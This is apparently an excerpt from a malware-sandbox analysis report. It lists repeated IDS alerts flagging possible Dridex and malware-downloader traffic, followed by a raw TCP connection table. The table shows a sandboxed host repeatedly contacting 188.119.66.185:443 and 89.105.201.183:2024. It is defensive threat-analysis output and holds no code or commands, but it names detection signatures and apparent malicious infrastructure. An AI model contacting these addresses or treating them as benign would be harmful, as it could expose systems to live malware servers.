                                                                              2024-12-18T13:50:46.393102+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1049848188.119.66.185443TCP
                                                                              2024-12-18T13:50:47.182885+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049848188.119.66.185443TCP
                                                                              2024-12-18T13:50:52.215337+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1049860188.119.66.185443TCP
                                                                              2024-12-18T13:50:53.101821+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049860188.119.66.185443TCP
                                                                              2024-12-18T13:50:54.683435+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1049866188.119.66.185443TCP
                                                                              2024-12-18T13:50:55.402293+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049866188.119.66.185443TCP
                                                                              2024-12-18T13:50:57.372299+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1049873188.119.66.185443TCP
                                                                              2024-12-18T13:50:58.056391+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049873188.119.66.185443TCP
                                                                              2024-12-18T13:50:59.690513+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1049881188.119.66.185443TCP
                                                                              2024-12-18T13:51:00.489357+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049881188.119.66.185443TCP
                                                                              2024-12-18T13:51:02.248787+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1049887188.119.66.185443TCP
                                                                              2024-12-18T13:51:02.932989+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049887188.119.66.185443TCP
                                                                              2024-12-18T13:51:04.724066+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1049896188.119.66.185443TCP
                                                                              2024-12-18T13:51:05.514546+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049896188.119.66.185443TCP
                                                                              2024-12-18T13:51:07.197577+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1049901188.119.66.185443TCP
                                                                              2024-12-18T13:51:07.875652+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049901188.119.66.185443TCP
                                                                              2024-12-18T13:51:09.461347+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1049905188.119.66.185443TCP
                                                                              2024-12-18T13:51:10.181163+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049905188.119.66.185443TCP
                                                                              2024-12-18T13:51:11.743256+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1049910188.119.66.185443TCP
                                                                              2024-12-18T13:51:12.428721+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049910188.119.66.185443TCP
                                                                              2024-12-18T13:51:13.998036+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1049916188.119.66.185443TCP
                                                                              2024-12-18T13:51:14.806062+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049916188.119.66.185443TCP
                                                                              2024-12-18T13:51:16.560803+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1049923188.119.66.185443TCP
                                                                              2024-12-18T13:51:17.242829+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049923188.119.66.185443TCP
                                                                              2024-12-18T13:51:19.083606+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1049930188.119.66.185443TCP
                                                                              2024-12-18T13:51:19.761430+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049930188.119.66.185443TCP
                                                                              2024-12-18T13:51:21.596955+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1049936188.119.66.185443TCP
                                                                              2024-12-18T13:51:22.288127+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049936188.119.66.185443TCP
                                                                              2024-12-18T13:51:23.865961+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1049943188.119.66.185443TCP
                                                                              2024-12-18T13:51:24.562804+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049943188.119.66.185443TCP
                                                                              2024-12-18T13:51:26.136097+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1049950188.119.66.185443TCP
                                                                              2024-12-18T13:51:26.821610+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049950188.119.66.185443TCP
                                                                              2024-12-18T13:51:28.436908+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1049956188.119.66.185443TCP
                                                                              2024-12-18T13:51:29.120824+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049956188.119.66.185443TCP
                                                                              2024-12-18T13:51:30.915113+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1049963188.119.66.185443TCP
                                                                              2024-12-18T13:51:31.622068+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049963188.119.66.185443TCP
                                                                              2024-12-18T13:51:33.333519+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1049969188.119.66.185443TCP
                                                                              2024-12-18T13:51:34.088417+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049969188.119.66.185443TCP
                                                                              2024-12-18T13:51:35.870738+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1049975188.119.66.185443TCP
                                                                              2024-12-18T13:51:36.552860+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049975188.119.66.185443TCP
                                                                              2024-12-18T13:51:38.316315+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1049981188.119.66.185443TCP
                                                                              2024-12-18T13:51:39.002791+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049981188.119.66.185443TCP
                                                                              2024-12-18T13:51:40.821190+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1049989188.119.66.185443TCP
                                                                              2024-12-18T13:51:41.523825+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049989188.119.66.185443TCP
                                                                              2024-12-18T13:51:43.173050+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1049995188.119.66.185443TCP
                                                                              2024-12-18T13:51:43.939637+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049995188.119.66.185443TCP
                                                                              2024-12-18T13:51:45.698502+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1050001188.119.66.185443TCP
                                                                              2024-12-18T13:51:46.468759+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1050001188.119.66.185443TCP
                                                                              2024-12-18T13:51:48.203505+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1050004188.119.66.185443TCP
                                                                              2024-12-18T13:51:48.968184+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1050004188.119.66.185443TCP
                                                                              2024-12-18T13:51:50.614745+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1050005188.119.66.185443TCP
                                                                              2024-12-18T13:51:51.353310+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1050005188.119.66.185443TCP
                                                                              2024-12-18T13:51:52.924243+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1050006188.119.66.185443TCP
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 18, 2024 13:50:42.574862003 CET49838443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:42.574901104 CET44349838188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:42.575018883 CET49838443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:42.584038019 CET49838443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:42.584055901 CET44349838188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:44.078480005 CET44349838188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:44.078830004 CET49838443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:44.129513025 CET49838443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:44.129539013 CET44349838188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:44.129952908 CET44349838188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:44.130055904 CET49838443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:44.132545948 CET49838443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:44.175328970 CET44349838188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:44.786736012 CET44349838188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:44.786806107 CET44349838188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:44.786958933 CET49838443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:44.789504051 CET49838443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:44.789522886 CET44349838188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:44.899425983 CET49848443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:44.899461985 CET44349848188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:44.899543047 CET49848443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:44.899884939 CET49848443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:44.899902105 CET44349848188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:46.392232895 CET44349848188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:46.393101931 CET49848443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:46.393102884 CET49848443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:46.393102884 CET49848443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:46.393121004 CET44349848188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:46.393134117 CET44349848188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:47.182869911 CET44349848188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:47.182926893 CET49848443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:47.182939053 CET44349848188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:47.182955980 CET44349848188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:47.182982922 CET49848443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:47.183007002 CET49848443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:47.183163881 CET49848443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:47.183176994 CET44349848188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:47.184222937 CET498542024192.168.2.1089.105.201.183
                                                                              Dec 18, 2024 13:50:47.304666042 CET20244985489.105.201.183192.168.2.10
                                                                              Dec 18, 2024 13:50:47.304781914 CET498542024192.168.2.1089.105.201.183
                                                                              Dec 18, 2024 13:50:47.304877996 CET498542024192.168.2.1089.105.201.183
                                                                              Dec 18, 2024 13:50:47.424810886 CET20244985489.105.201.183192.168.2.10
                                                                              Dec 18, 2024 13:50:47.424877882 CET498542024192.168.2.1089.105.201.183
                                                                              Dec 18, 2024 13:50:47.544393063 CET20244985489.105.201.183192.168.2.10
                                                                              Dec 18, 2024 13:50:48.642221928 CET20244985489.105.201.183192.168.2.10
                                                                              Dec 18, 2024 13:50:48.694513083 CET498542024192.168.2.1089.105.201.183
                                                                              Dec 18, 2024 13:50:50.649504900 CET49860443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:50.649564981 CET44349860188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:50.649663925 CET49860443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:50.649879932 CET49860443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:50.649898052 CET44349860188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:52.215256929 CET44349860188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:52.215337038 CET49860443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:52.215800047 CET49860443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:52.215807915 CET44349860188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:52.215985060 CET49860443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:52.215990067 CET44349860188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:53.101834059 CET44349860188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:53.101910114 CET44349860188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:53.101921082 CET49860443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:53.101953030 CET49860443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:53.102142096 CET49860443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:53.102161884 CET44349860188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:53.212589025 CET49866443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:53.212620974 CET44349866188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:53.212749004 CET49866443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:53.213021994 CET49866443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:53.213033915 CET44349866188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:54.683295012 CET44349866188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:54.683434963 CET49866443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:54.684115887 CET49866443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:54.684122086 CET44349866188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:54.684245110 CET49866443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:54.684250116 CET44349866188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:55.402328968 CET44349866188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:55.402384043 CET49866443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:55.402426004 CET44349866188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:55.402478933 CET49866443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:55.402486086 CET44349866188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:55.402499914 CET44349866188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:55.402525902 CET49866443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:55.402635098 CET49866443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:55.402698994 CET49866443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:55.402709961 CET44349866188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:55.403667927 CET498722024192.168.2.1089.105.201.183
                                                                              Dec 18, 2024 13:50:55.524350882 CET20244987289.105.201.183192.168.2.10
                                                                              Dec 18, 2024 13:50:55.525609016 CET498722024192.168.2.1089.105.201.183
                                                                              Dec 18, 2024 13:50:55.525679111 CET498722024192.168.2.1089.105.201.183
                                                                              Dec 18, 2024 13:50:55.525743008 CET498722024192.168.2.1089.105.201.183
                                                                              Dec 18, 2024 13:50:55.634188890 CET49873443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:55.634224892 CET44349873188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:55.634366035 CET49873443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:55.634776115 CET49873443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:55.634793997 CET44349873188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:55.746351957 CET20244987289.105.201.183192.168.2.10
                                                                              Dec 18, 2024 13:50:55.791678905 CET20244987289.105.201.183192.168.2.10
                                                                              Dec 18, 2024 13:50:56.678818941 CET20244987289.105.201.183192.168.2.10
                                                                              Dec 18, 2024 13:50:56.678932905 CET498722024192.168.2.1089.105.201.183
                                                                              Dec 18, 2024 13:50:57.372152090 CET44349873188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:57.372298956 CET49873443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:57.372848988 CET49873443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:57.372864008 CET44349873188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:57.373034954 CET49873443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:57.373049021 CET44349873188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:58.056476116 CET44349873188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:58.056715965 CET44349873188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:58.056746006 CET49873443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:58.056785107 CET49873443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:58.056843996 CET49873443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:58.056859016 CET44349873188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:58.165138006 CET49881443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:58.165169001 CET44349881188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:58.165236950 CET49881443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:58.165479898 CET49881443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:58.165492058 CET44349881188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:59.690438032 CET44349881188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:59.690512896 CET49881443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:59.691092014 CET49881443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:59.691097021 CET44349881188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:50:59.691332102 CET49881443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:50:59.691338062 CET44349881188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:00.489451885 CET44349881188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:00.489588022 CET44349881188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:00.489644051 CET49881443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:00.489670038 CET49881443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:00.489948034 CET49881443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:00.489960909 CET44349881188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:00.602802038 CET49887443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:00.602869987 CET44349887188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:00.602952957 CET49887443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:00.603178024 CET49887443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:00.603197098 CET44349887188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:02.248491049 CET44349887188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:02.248786926 CET49887443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:02.249234915 CET49887443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:02.249247074 CET44349887188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:02.249429941 CET49887443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:02.249435902 CET44349887188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:02.933041096 CET44349887188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:02.933116913 CET49887443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:02.933126926 CET44349887188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:02.933176994 CET49887443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:02.935077906 CET49887443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:02.935096979 CET44349887188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:03.055799961 CET49896443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:03.055852890 CET44349896188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:03.055952072 CET49896443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:03.056324959 CET49896443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:03.056339025 CET44349896188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:04.723997116 CET44349896188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:04.724066019 CET49896443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:04.724455118 CET49896443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:04.724462032 CET44349896188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:04.724653959 CET49896443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:04.724658966 CET44349896188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:05.514569044 CET44349896188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:05.514643908 CET44349896188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:05.514677048 CET49896443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:05.514704943 CET49896443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:05.534476995 CET49896443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:05.534507036 CET44349896188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:05.688836098 CET49901443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:05.688891888 CET44349901188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:05.689028978 CET49901443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:05.690088034 CET49901443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:05.690104008 CET44349901188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:07.195698023 CET44349901188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:07.197577000 CET49901443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:07.198014021 CET49901443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:07.198020935 CET44349901188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:07.198179960 CET49901443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:07.198185921 CET44349901188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:07.875611067 CET44349901188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:07.875683069 CET49901443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:07.875685930 CET44349901188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:07.875732899 CET49901443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:07.876013041 CET49901443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:07.876041889 CET44349901188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:07.993635893 CET49905443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:07.993685007 CET44349905188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:07.993742943 CET49905443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:07.994132996 CET49905443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:07.994148016 CET44349905188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:09.461261988 CET44349905188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:09.461347103 CET49905443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:09.470988035 CET49905443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:09.471012115 CET44349905188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:09.471174955 CET49905443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:09.471183062 CET44349905188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:10.181215048 CET44349905188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:10.181266069 CET44349905188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:10.181345940 CET49905443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:10.181531906 CET49905443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:10.181545019 CET44349905188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:10.290061951 CET49910443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:10.290127039 CET44349910188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:10.290250063 CET49910443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:10.290479898 CET49910443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:10.290489912 CET44349910188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:11.743160009 CET44349910188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:11.743256092 CET49910443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:11.743738890 CET49910443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:11.743745089 CET44349910188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:11.743915081 CET49910443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:11.743921041 CET44349910188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:12.428741932 CET44349910188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:12.428809881 CET44349910188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:12.429035902 CET49910443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:12.429389954 CET49910443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:12.429400921 CET44349910188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:12.540200949 CET49916443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:12.540255070 CET44349916188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:12.540335894 CET49916443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:12.540610075 CET49916443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:12.540622950 CET44349916188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:13.997942924 CET44349916188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:13.998035908 CET49916443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:13.998534918 CET49916443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:13.998543024 CET44349916188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:13.998703003 CET49916443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:13.998720884 CET44349916188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:14.806103945 CET44349916188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:14.806195021 CET44349916188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:14.806230068 CET49916443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:14.806278944 CET49916443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:14.806379080 CET49916443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:14.806416035 CET44349916188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:14.915188074 CET49923443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:14.915225029 CET44349923188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:14.915287018 CET49923443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:14.915528059 CET49923443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:14.915548086 CET44349923188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:16.560688019 CET44349923188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:16.560802937 CET49923443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:16.561332941 CET49923443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:16.561342955 CET44349923188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:16.561505079 CET49923443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:16.561510086 CET44349923188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:17.242845058 CET44349923188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:17.242913008 CET44349923188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:17.242965937 CET49923443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:17.242996931 CET49923443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:17.287265062 CET49923443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:17.287297010 CET44349923188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:17.431129932 CET49930443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:17.431164980 CET44349930188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:17.431236029 CET49930443192.168.2.10188.119.66.185
